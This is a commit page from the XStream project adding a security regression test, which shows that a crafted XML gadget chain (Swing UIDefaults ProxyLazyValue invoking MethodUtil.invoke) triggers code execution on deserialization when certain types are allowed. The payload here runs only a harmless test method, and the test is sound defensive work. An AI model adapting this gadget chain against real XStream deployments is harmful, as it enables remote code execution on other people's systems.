Skip to content

Commit

Permalink
Add security test for RCE with Swing UIDefaults.
Browse files Browse the repository at this point in the history
  • Loading branch information
@joehni
joehni committed May 15, 2024
1 parent 2cf25e6 commit f126811
Showing 1 changed file with 91 additions and 1 deletion.
92 changes: 91 additions & 1 deletion xstream/src/test/com/thoughtworks/acceptance/SecurityVulnerabilityTest.java
View file
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
/*
* Copyright (C) 2013, 2014, 2017, 2018, 2020, 2021, 2022 XStream Committers.
* Copyright (C) 2013, 2014, 2017, 2018, 2020, 2021, 2022, 2024 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
Expand Down Expand Up @@ -121,6 +121,96 @@ public void testExplicitlyConvertImageIOContainsFilter() {
assertEquals("Executed!", BUFFER.toString());
}

public void testExplicitlyConvertSwingUIDefaults() {
final String xml = ""
+ "<hashtable>\n"
+ " <entry>\n"
+ " <javax.swing.UIDefaults_-TextAndMnemonicHashMap serialization=\"custom\">\n"
+ " <unserializable-parents/>\n"
+ " <map>\n"
+ " <default>\n"
+ " <loadFactor>1.0</loadFactor>\n"
+ " <threshold>12</threshold>\n"
+ " </default>\n"
+ " <int>16</int>\n"
+ " <int>1</int>\n"
+ " <javax.activation.MimeTypeParameterList>\n"
+ " <parameters class=\"javax.swing.UIDefaults\" serialization=\"custom\">\n"
+ " <unserializable-parents/>\n"
+ " <hashtable>\n"
+ " <default>\n"
+ " <loadFactor>0.75</loadFactor>\n"
+ " <threshold>525</threshold>\n"
+ " </default>\n"
+ " <int>700</int>\n"
+ " <int>1</int>\n"
+ " <string>1</string>\n"
+ " <javax.swing.UIDefaults_-ProxyLazyValue>\n"
+ " <className>sun.reflect.misc.MethodUtil</className>\n"
+ " <methodName>invoke</methodName>\n"
+ " <args>\n"
+ " <method>\n"
+ " <class>sun.reflect.misc.MethodUtil</class>\n"
+ " <name>invoke</name>\n"
+ " <parameter-types>\n"
+ " <class>java.lang.reflect.Method</class>\n"
+ " <class>java.lang.Object</class>\n"
+ " <class>[Ljava.lang.Object;</class>\n"
+ " </parameter-types>\n"
+ " </method>\n"
+ " <object/>\n"
+ " <object-array>\n"
+ " <method>\n"
+ " <class>com.thoughtworks.acceptance.SecurityVulnerabilityTest$Exec</class>\n"
+ " <name>exec</name>\n"
+ " <parameter-types/>\n"
+ " </method>\n"
+ " <com.thoughtworks.acceptance.SecurityVulnerabilityTest_-Exec/>\n"
+ " <object-array/>\n"
+ " </object-array>\n"
+ " </args>\n"
+ " </javax.swing.UIDefaults_-ProxyLazyValue>\n"
+ " </hashtable>\n"
+ " <javax.swing.UIDefaults>\n"
+ " <default>\n"
+ " <defaultLocale>zh_CN</defaultLocale>\n"
+ " <resourceCache/>\n"
+ " </default>\n"
+ " </javax.swing.UIDefaults>\n"
+ " </parameters>\n"
+ " </javax.activation.MimeTypeParameterList>\n"
+ " <null/>\n"
+ " </map>\n"
+ " </javax.swing.UIDefaults_-TextAndMnemonicHashMap>\n"
+ " <int>1</int>\n"
+ " </entry>\n"
+ " <entry>\n"
+ " <javax.swing.UIDefaults_-TextAndMnemonicHashMap serialization=\"custom\">\n"
+ " <unserializable-parents/>\n"
+ " <map>\n"
+ " <default>\n"
+ " <loadFactor>1.0</loadFactor>\n"
+ " <threshold>12</threshold>\n"
+ " </default>\n"
+ " <int>16</int>\n"
+ " <int>1</int>\n"
+ " <javax.activation.MimeTypeParameterList reference=\"../../../../entry/javax.swing.UIDefaults_-TextAndMnemonicHashMap/map/javax.activation.MimeTypeParameterList\"/>\n"
+ " <null/>\n"
+ " </map>\n"
+ " </javax.swing.UIDefaults_-TextAndMnemonicHashMap>\n"
+ " <int>1</int>\n"
+ " </entry>\n"
+ "</hashtable>";

xstream.allowTypes(
"javax.activation.MimeTypeParameterList", "javax.swing.UIDefaults$ProxyLazyValue");

assertEquals(0, BUFFER.length());
final Hashtable<?,?> hashtable = xstream.fromXML(xml);
assertEquals("Executed!", BUFFER.toString());
assertNotNull(hashtable);
}

public static class Exec {

public void exec() {
Expand Down

0 comments on commit f126811

Please sign in to comment.